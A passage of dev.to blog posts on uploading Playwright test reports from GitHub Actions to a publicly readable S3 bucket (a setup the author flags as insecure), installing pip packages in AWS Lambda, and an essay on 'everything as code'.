test scenarios is end-to-end testing: it verifies real business functionality and replaces manual clicking with automated test suites.</p> <p>In my job, I've encountered a tool called <a href="https://playwright.dev/" rel="noopener noreferrer">Playwright</a> for this purpose and was greatly impressed by its capabilities. You can program it to do all the things you do manually -- and run them automatically without needing to open a browser. It's no wonder someone took the time to transform such bloatware as a modern browser into something more automation-friendly. Amazing!</p> <p>The complication starts when these scenarios need to be integrated into the CI/CD pipeline. It's pretty simple when you trigger tests locally and then review the saved report in your browser. But what if you want to run tests in a centralized CI/CD tool and save the report for further review? And this is where S3 comes to save the day once again!</p> <h2> GitHub Actions setup </h2> <p>The first step in configuring automated tests in the CI/CD pipeline is quite simple and already covered in the <a href="https://playwright.dev/docs/ci#github-actions" rel="noopener noreferrer">Playwright documentation</a>. The workflow configuration is pretty straightforward:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">name</span><span class="pi">:</span> <span class="s">Playwright Tests</span> <span class="na">on</span><span class="pi">:</span> <span class="na">push</span><span class="pi">:</span> <span class="na">branches</span><span class="pi">:</span> <span class="pi">[</span> <span class="nv">main</span><span class="pi">,</span> <span class="nv">master</span> <span class="pi">]</span> <span class="na">pull_request</span><span class="pi">:</span> <span class="na">branches</span><span class="pi">:</span> <span class="pi">[</span> <span class="nv">main</span><span class="pi">,</span> <span class="nv">master</span> <span class="pi">]</span> <span class="na">jobs</span><span class="pi">:</span> <span class="na">test</span><span class="pi">:</span> <span class="na">timeout-minutes</span><span class="pi">:</span> <span class="m">60</span> <span class="na">runs-on</span><span class="pi">:</span> <span class="s">ubuntu-latest</span> <span class="na">steps</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@v4</span> <span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/setup-node@v4</span> <span class="na">with</span><span class="pi">:</span> <span class="na">node-version</span><span class="pi">:</span> <span class="s">lts/*</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Install dependencies</span> <span class="na">run</span><span class="pi">:</span> <span class="s">npm ci</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Install Playwright Browsers</span> <span class="na">run</span><span class="pi">:</span> <span class="s">npx playwright install --with-deps</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Run Playwright tests</span> <span class="na">run</span><span class="pi">:</span> <span class="s">npx playwright test</span> <span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/upload-artifact@v4</span> <span class="na">if</span><span class="pi">:</span> <span class="s">${{ !cancelled() }}</span> <span class="na">with</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">playwright-report</span> <span class="na">path</span><span class="pi">:</span> <span class="s">playwright-report/</span> <span class="na">retention-days</span><span class="pi">:</span> <span class="m">30</span> </code></pre> </div> <p>I just want to emphasize a few key points here.</p> <p>We must use Ubuntu as the base image because Playwright dependencies rely exclusively on Debian <a href="https://github.com/microsoft/playwright/blob/cb74d37063dd9add760b49db001bbfa950d77e5b/packages/playwright-core/src/server/registry/dependencies.ts#L110" rel="noopener noreferrer">package distributions</a>. This should not be an issue when running tests in the pipeline, but for local setups on RHEL-based distributions, it might introduce some fun challenges.</p> <p>Also, running tests on every pull request and push to main branches can be time-consuming, so it makes perfect sense to cache the bloated browser downloads (which are around 500 MB) and store them for a while. In the following example, we cache them for a day:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Get date</span> <span class="na">id</span><span class="pi">:</span> <span class="s">date</span> <span class="na">run</span><span class="pi">:</span> <span class="s">echo "date=$(date +%Y-%m-%d)" &gt;&gt; $GITHUB_OUTPUT</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Cache Playwright browsers</span> <span class="na">id</span><span class="pi">:</span> <span class="s">cache-playwright-browsers</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/cache@v4</span> <span class="na">with</span><span class="pi">:</span> <span class="na">path</span><span class="pi">:</span> <span class="s">~/.cache/ms-playwright</span> <span class="na">key</span><span class="pi">:</span> <span class="s">playwright-browsers-${{ steps.date.outputs.date }}</span> </code></pre> </div> <h2> S3 bucket setup </h2> <p>The first part of the configuration is done -- now let’s do something about those reports, right?</p> <p>Obviously, we need a bucket. So let’s create one. For the sake of simplicity, I’ll provide only the Terraform code here.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># S3 bucket for e2e test reports</span> <span class="nx">resource</span> <span class="s2">"aws_s3_bucket"</span> <span class="s2">"e2e_test_reports"</span> <span class="p">{</span> <span class="nx">bucket</span> <span class="p">=</span> <span class="s2">"playwright-test-reports"</span> <span class="p">}</span> <span class="c1"># Bucket ownership controls</span> <span class="nx">resource</span> <span class="s2">"aws_s3_bucket_ownership_controls"</span> <span class="s2">"e2e_test_reports"</span> <span class="p">{</span> <span class="nx">bucket</span> <span class="p">=</span> <span class="nx">aws_s3_bucket</span><span class="p">.</span><span class="nx">e2e_test_reports</span><span class="p">.</span><span class="nx">id</span> <span class="nx">rule</span> <span class="p">{</span> <span class="nx">object_ownership</span> <span class="p">=</span> <span class="s2">"BucketOwnerEnforced"</span> <span class="p">}</span> <span class="p">}</span> <span class="c1"># Lifecycle configuration for expiration after 30 days</span> <span class="nx">resource</span> <span class="s2">"aws_s3_bucket_lifecycle_configuration"</span> <span class="s2">"e2e_test_reports"</span> <span class="p">{</span> <span class="nx">bucket</span> <span class="p">=</span> <span class="nx">aws_s3_bucket</span><span class="p">.</span><span class="nx">e2e_test_reports</span><span class="p">.</span><span class="nx">id</span> <span class="nx">rule</span> <span class="p">{</span> <span class="nx">id</span> <span class="p">=</span> <span class="s2">"delete-30d"</span> <span class="nx">status</span> <span class="p">=</span> <span class="s2">"Enabled"</span> <span class="nx">expiration</span> <span class="p">{</span> <span class="nx">days</span> <span class="p">=</span> <span class="mi">30</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="c1"># Public access policy for the bucket</span> <span class="nx">resource</span> <span class="s2">"aws_s3_bucket_policy"</span> <span class="s2">"e2e_test_reports"</span> <span class="p">{</span> <span class="nx">bucket</span> <span class="p">=</span> <span class="nx">aws_s3_bucket</span><span class="p">.</span><span class="nx">e2e_test_reports</span><span class="p">.</span><span class="nx">id</span> <span class="nx">policy</span> <span class="p">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">aws_iam_policy_document</span><span class="p">.</span><span class="nx">e2e_test_reports_public</span><span class="p">.</span><span class="nx">json</span> <span class="p">}</span> <span class="c1"># Public access block settings</span> <span class="nx">resource</span> <span class="s2">"aws_s3_bucket_public_access_block"</span> <span class="s2">"e2e_test_reports"</span> <span class="p">{</span> <span class="nx">bucket</span> <span class="p">=</span> <span class="nx">aws_s3_bucket</span><span class="p">.</span><span class="nx">e2e_test_reports</span><span class="p">.</span><span class="nx">id</span> <span class="nx">block_public_acls</span> <span class="p">=</span> <span class="kc">false</span> <span class="nx">block_public_policy</span> <span class="p">=</span> <span class="kc">false</span> <span class="nx">ignore_public_acls</span> <span class="p">=</span> <span class="kc">false</span> <span class="nx">restrict_public_buckets</span> <span class="p">=</span> <span class="kc">false</span> <span class="p">}</span> <span class="c1"># Policy document for public read access</span> <span class="nx">data</span> <span class="s2">"aws_iam_policy_document"</span> <span class="s2">"e2e_test_reports_public"</span> <span class="p">{</span> <span class="nx">statement</span> <span class="p">{</span> <span class="nx">principals</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="s2">"*"</span> <span class="nx">identifiers</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"*"</span><span class="p">]</span> <span class="p">}</span> <span class="nx">actions</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"s3:GetObject"</span><span class="p">]</span> <span class="nx">resources</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"${aws_s3_bucket.e2e_test_reports.arn}/*"</span><span class="p">]</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>As you can see, the configuration is pretty basic. We enable a lifecycle policy to delete files after 30 days, since there's rarely a need to keep old test reports. We also attach a fairly permissive bucket policy, allowing us to view report files directly in the browser without needing to log into the AWS Web Console.</p> <h2> Finalizing the report publication </h2> <p>After the preparation, we are now ready to run the tests and view the reports directly in our browser.</p> <p>To upload files from the GitHub Actions pipeline, we need to acquire AWS credentials. Here is <a href="https://docs.github.com/en/actions/security-for-github-actions/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services" rel="noopener noreferrer">the manual</a> on how to configure OIDC in AWS for GitHub, which is supported by <code>aws-actions/configure-aws-credentials@v4</code>. To retrieve the necessary credentials properly, we provide additional permissions: <code>id-token: write</code> and <code>contents: read</code>.</p> <p>Then we configure the test setup as usual, and at the end, we archive the resulting report in two places: GitHub Artifacts and S3. Since we previously created fairly open access to the files in our bucket, we add a layer of obscurity by including a random UUID string in the file path. This way, any malicious actor -- should they be determined to view our failing tests -- would have to deduce at least three variables: the random UUID (complex), the PR number (trivial), and the GitHub run ID (somewhat complex).</p> <p>Let’s take a look at how the final GitHub Actions workflow looks.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">name</span><span class="pi">:</span> <span class="s">Playwright Tests</span> <span class="na">on</span><span class="pi">:</span> <span class="na">push</span><span class="pi">:</span> <span class="na">branches</span><span class="pi">:</span> <span class="pi">[</span> <span class="nv">main</span><span class="pi">,</span> <span class="nv">master</span> <span class="pi">]</span> <span class="na">pull_request</span><span class="pi">:</span> <span class="na">branches</span><span class="pi">:</span> <span class="pi">[</span> <span class="nv">main</span><span class="pi">,</span> <span class="nv">master</span> <span class="pi">]</span> <span class="na">jobs</span><span class="pi">:</span> <span class="na">test</span><span class="pi">:</span> <span class="na">timeout-minutes</span><span class="pi">:</span> <span class="m">60</span> <span class="na">runs-on</span><span class="pi">:</span> <span class="s">ubuntu-latest</span> <span class="na">env</span><span class="pi">:</span> <span class="na">BUCKET_NAME</span><span class="pi">:</span> <span class="s1">'</span><span class="s">playwright-test-reports'</span> <span class="na">AWS_REGION</span><span class="pi">:</span> <span class="s1">'</span><span class="s">eu-west-1'</span> <span class="na">AWS_ASSUMED_ROLE</span><span class="pi">:</span> <span class="s1">'</span><span class="s">arn:aws:iam::123456789012:role/github-actions-role'</span> <span class="na">permissions</span><span class="pi">:</span> <span class="na">id-token</span><span class="pi">:</span> <span class="s">write</span> <span class="na">contents</span><span class="pi">:</span> <span class="s">read</span> <span class="na">steps</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@v4</span> <span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/setup-node@v4</span> <span class="na">with</span><span class="pi">:</span> <span class="na">node-version</span><span class="pi">:</span> <span class="s">lts/*</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Configure AWS credentials</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">aws-actions/configure-aws-credentials@v4</span> <span class="na">with</span><span class="pi">:</span> <span class="na">role-to-assume</span><span class="pi">:</span> <span class="s">${{ env.AWS_ASSUMED_ROLE }}</span> <span class="na">role-session-name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">github-actions'</span> <span class="na">aws-region</span><span class="pi">:</span> <span class="s">${{ env.AWS_REGION }}</span> <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">date</span> <span class="na">run</span><span class="pi">:</span> <span class="s">echo "date=$(date +%Y-%m-%d)" &gt;&gt; $GITHUB_OUTPUT</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Install dependencies</span> <span class="na">run</span><span class="pi">:</span> <span class="s">npm ci</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Cache Playwright browsers</span> <span class="na">id</span><span class="pi">:</span> <span class="s">cache-playwright-browsers</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/cache@v4</span> <span class="na">with</span><span class="pi">:</span> <span class="na">path</span><span class="pi">:</span> <span class="s">~/.cache/ms-playwright</span> <span class="na">key</span><span class="pi">:</span> <span class="s">playwright-browsers-${{ steps.date.outputs.date }}</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Install Playwright browsers</span> <span class="na">if</span><span class="pi">:</span> <span class="s">steps.cache-playwright-browsers.outputs.cache-hit != 'true'</span> <span class="na">run</span><span class="pi">:</span> <span class="s">npx playwright install --with-deps</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Run Playwright tests</span> <span class="na">run</span><span class="pi">:</span> <span class="s">npx playwright test</span> <span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/upload-artifact@v4</span> <span class="na">if</span><span class="pi">:</span> <span class="s">always()</span> <span class="na">with</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">playwright-report</span> <span class="na">path</span><span class="pi">:</span> <span class="s">playwright-report/</span> <span class="na">retention-days</span><span class="pi">:</span> <span class="m">30</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Upload Test Report to S3</span> <span class="na">if</span><span class="pi">:</span> <span class="s">always()</span> <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span> <span class="s">RANDOM_ID="$(uuidgen -r)"</span> <span class="s">aws s3 cp --recursive ./playwright-report/ s3://${{ env.BUCKET_NAME }}/${RANDOM_ID}/PR${{ github.event.pull_request.number }}/${{ github.run_id }}/</span> <span class="s">echo "Uploaded test report to S3: https://${{ env.BUCKET_NAME }}.s3.${{ env.AWS_REGION }}.amazonaws.com/${RANDOM_ID}/PR${{ github.event.pull_request.number }}/${{ github.run_id }}/index.html"</span> </code></pre> </div> <p>Of course, this solution is far from secure. To improve the safety of publishing test reports, we can use Signed URLs and serve those instead of direct links. Alternatively, we can modify the bucket policy to allow access only from <a href="https://repost.aws/knowledge-center/block-s3-traffic-vpc-ip" rel="noopener noreferrer">specific IP addresses</a>, such as your VPN. The possibilities are vast!</p> aws cicd s3 testing Installing Python dependencies in AWS Lambda: easy pip guide Kirill Mon, 31 Mar 2025 09:16:03 +0000 https://dev.to/aws-builders/installing-python-dependencies-in-aws-lambda-easy-pip-guide-31o6 https://dev.to/aws-builders/installing-python-dependencies-in-aws-lambda-easy-pip-guide-31o6 <p>Two easy ways to include a pip package for your Python Lambda function.</p> <h2> Defining the problem </h2> <p>I love AWS Lambda functions. For me, they provide a very handy way to run<br> ad-hoc tasks when I need them, and basically for free. To some extent, I see<br> them as a replacement for cron tasks when I don't have a 24/7 running server<br> somewhere -- which, I think, most of us don't.</p> <p>Lambda is a platform-agnostic, multi-language, (a)synchronous<sup id="fnref1">1</sup> code<br> execution runtime. It allows for a vast variety of applications, ranging from<br> simple notification forwarding to full-scale serverless applications.</p> <p>However, what Lambda lacks is built-in dependency management.</p> <h2> Method 1: Installing a pip package inside the Lambda function </h2> <p>The easiest way to include the necessary pip package is to install it within<br> the Lambda function itself.</p> <p>We have limited possibilities for configuring the function runtime. However, we<br> do have write access to the <code>/tmp</code> location of the underlying environment, and<br> this is exactly what we will use to install the necessary packages.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">subprocess</span> <span class="kn">import</span> <span class="n">sys</span> <span class="kn">import</span> <span class="n">boto3</span> <span class="kn">from</span> <span class="n">botocore.exceptions</span> <span class="kn">import</span> <span class="n">ClientError</span> <span class="n">subprocess</span><span class="p">.</span><span class="nf">call</span><span class="p">(</span> <span class="sh">"</span><span class="s">pip install requests -t /tmp/ --no-cache-dir</span><span class="sh">"</span><span class="p">.</span><span class="nf">split</span><span class="p">(),</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">DEVNULL</span><span class="p">,</span> <span class="n">stderr</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">DEVNULL</span><span class="p">,</span> <span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">insert</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="sh">"</span><span class="s">/tmp/</span><span class="sh">"</span><span class="p">)</span> <span class="kn">import</span> <span class="n">requests</span> </code></pre> </div> <p>First, we use the <code>subprocess</code> and <code>sys</code> modules to call a subprocess and<br> modify the search path so that the installed package can be accessed.</p> <p>Then, we call the <code>subprocess</code> function to install the pip package into the<br> <code>/tmp</code> folder.</p> <p>Finally, we import the freshly installed package as usual.</p> <h3> Considerations and limitations </h3> <p>This method is quite easy and straightforward. It allows us to add a few lines<br> of code to a function without the necessity of managing external dependencies<br> (which we will discuss later).</p> <p>However, this solution may not be ideal in situations where you have complex<br> dependencies used across multiple functions. Since Lambda functions are billed<br> based on their execution time, the more dependencies are installed this way,<br> the higher the cost will be and the slower the code will execute.</p> <h2> Method 2: Creating Lambda layers </h2> <p>This method is a bit more complicated.</p> <p>To properly create a Lambda layer that provides the necessary dependencies, the<br> package must be structured in a specific way.</p> <p>First, we create a virtual environment for the required package (or packages):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 <span class="nt">-m</span> venv lambda_layer <span class="nb">source </span>lambda_layer/bin/activate pip <span class="nb">install </span>requests </code></pre> </div> <p>As a result, we get the following directory structure in our Lambda layer:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>lambda_layer/ ├── bin │   ├── activate │   ├── activate.csh │   ├── activate.fish │   ├── Activate.ps1 │   ├── normalizer │   ├── pip │   ├── pip3 │   ├── pip3.13 │   ├── python -&gt; python3 │   ├── python3 -&gt; /usr/bin/python3 │   └── python3.13 -&gt; python3 ├── include │   └── python3.13 ├── lib │   └── python3.13 │   └── site-packages │   ├── certifi │   ├── certifi-2025.1.31.dist-info │   ├── charset_normalizer │   ├── charset_normalizer-3.4.1.dist-info │   ├── idna │   ├── idna-3.10.dist-info │   ├── pip │   ├── pip-24.2.dist-info │   ├── requests │   ├── requests-2.32.3.dist-info │   ├── urllib3 │   └── urllib3-2.3.0.dist-info ├── lib64 -&gt; lib └── pyvenv.cfg </code></pre> </div> <p>However, we don’t need all of these contents. What we actually need is only the<br> <code>lib</code> directory. So, we take it and archive it:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">mkdir </span>python <span class="nb">cp</span> <span class="nt">-r</span> lambda_layer/lib/ python/ zip <span class="nt">-r</span> python-requests.zip python/ </code></pre> </div> <p>The last step is to upload this layer to AWS:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws lambda publish-layer-version <span class="nt">--layer-name</span> python-requests-layer <span class="se">\</span> <span class="nt">--zip-file</span> fileb://python-requests.zip <span class="se">\</span> <span class="nt">--compatible-runtimes</span> python3.13 <span class="se">\</span> <span class="nt">--compatible-architectures</span> <span class="s2">"arm64"</span> </code></pre> </div> <p>Now, this layer will be available for us to use in our functions:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fse8q6gclj3g1jn753fnf.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fse8q6gclj3g1jn753fnf.webp" alt="Lambda layer" width="800" height="218"></a></p> <h3> Considerations and limitations </h3> <p>This method allows for more complex and extensive dependencies inside your<br> Lambda functions. It provides immutable package versions in your runtime.<br> However, it requires managing external dependencies and their versions<br> manually<sup id="fnref2">2</sup>.</p> <p>In situations involving multiple interconnected package dependencies, the<br> safest approach is to create a single Lambda layer containing all the required<br> packages from your local machine. Just make sure that the code and its<br> dependencies work as intended.</p> <ol> <li id="fn1"> <p>Lambda functions can be executed both synchronously and asynchronously. ↩</p> </li> <li id="fn2"> <p>Which also can be automated pretty easily: uploading a new layer requires just seven lines of a shell script and a <code>requirements.txt</code> file. ↩</p> </li> </ol> aws lambda python Everything* as code Kirill Fri, 07 Mar 2025 13:34:28 +0000 https://dev.to/hatedabamboo/everything-as-code-3he6 https://dev.to/hatedabamboo/everything-as-code-3he6 <p>Hello, dear visitor. Seeing you here today means you're likely a developer, engineer, coder, or some combination of these -- and that you're familiar with the term "code". For several decades engineers all over the world were writing code. This code, first and foremost, was meant to solve problems. And today I would like to tell you about solving even more problems with the power of code. I will show you why and how we should use code for more and more scenarios across our professional and personal lives.</p> <h2> Information as code </h2> <p>Before diving into 21st century, let’s step back and consider what "code" really means. Today, we use it for programming, automation, and infrastructure, but the idea of encoding information in a structured, repeatable way has been around for centuries.</p> <p>What comes to mind when you hear the word "code"? Most of us (myself included) immediately think of a programming language.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwwdhpkl0uwvx7si2iebn.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwwdhpkl0uwvx7si2iebn.png" alt="Do you know this function?" width="800" height="441"></a></p> <p>But the word "code" wasn’t originally popularized by programmers. Long before computers existed, humans developed ways to encode information, often to preserve knowledge, communicate securely. One of the earliest examples comes from cryptography.</p> <p>Cryptography is one of my many interests. Ciphers, cryptography algorithms, encryption, all that jazz. The practice of encoding information goes back to Ancient Egypt, but one of the earliest well-known encryption methods is Caesar’s Cipher (also called Caesar’s Code).</p> <p>Caesar’s Cipher is a simple technique: shifting letters forward in the alphabet to obscure the original message, making it unreadable to anyone who doesn’t know the shift pattern. The result? Encoded information. Information hidden as (somewhat) code.</p> <p>At its core, this is the same principle that modern software engineering follows. We structure information in standardized formats so it can be stored, processed, and used reliably. Whether it’s YAML configurations, JSON APIs, or structured documentation, we encode information in ways that make it easy to retrieve, automate, and keep track of.</p> <h2> Logic as code </h2> <p>Now let's get back to our time.</p> <p>Programmers have been writing software at least since 1940. This software is meant to solve different problems: calculate the sum of two numbers, print "Hello World", launch people in space and send memes to your friends. What all these examples have in common? They encapsulate the logic. An algorithm that describes an order of actions to achieve the necessary result.</p> <p>Indifferent to complexity, all software is alike in this regard. They have an input: be that a number, a certain trigger, a file. They have from one to infinity steps in their core process, each of which performs a certain action. And they have an output: a rocket engine that's starting, a package with part of a meme flying over fiber optics, or a number.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feabbhipio590401n8uqo.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feabbhipio590401n8uqo.png" alt="The logic" width="711" height="252"></a></p> <p>And the logic presented in this very part is described via code.</p> <p>Why is it this way?</p> <p>Thinking rocks (computers) think in a certain way. In a very structured way. In a way that is predictable and repeatable. The same way the code that is written for these computers have to be predictable and repeatable. This way, we can make sure that, unlike meat people, when a computer is asked to run "Hello World" a million times, it will do exactly that -- and not complain on the 10th repetition that "This is pointless" or "Go hello yourself".</p> <p>Making logic structured, reliable, repeatable helps people offload some of mental capacity on other things. For example, write more code! Create games! Or learn how to play violin!</p> <p>Would you like to know more?</p> <p>Head on to my blog to <a href="https://notes.hatedabamboo.me/almost-everything-as-code/#configuration-as-code" rel="noopener noreferrer">continue reading</a> the rest of the article!</p> devops infrastructureascode documentation git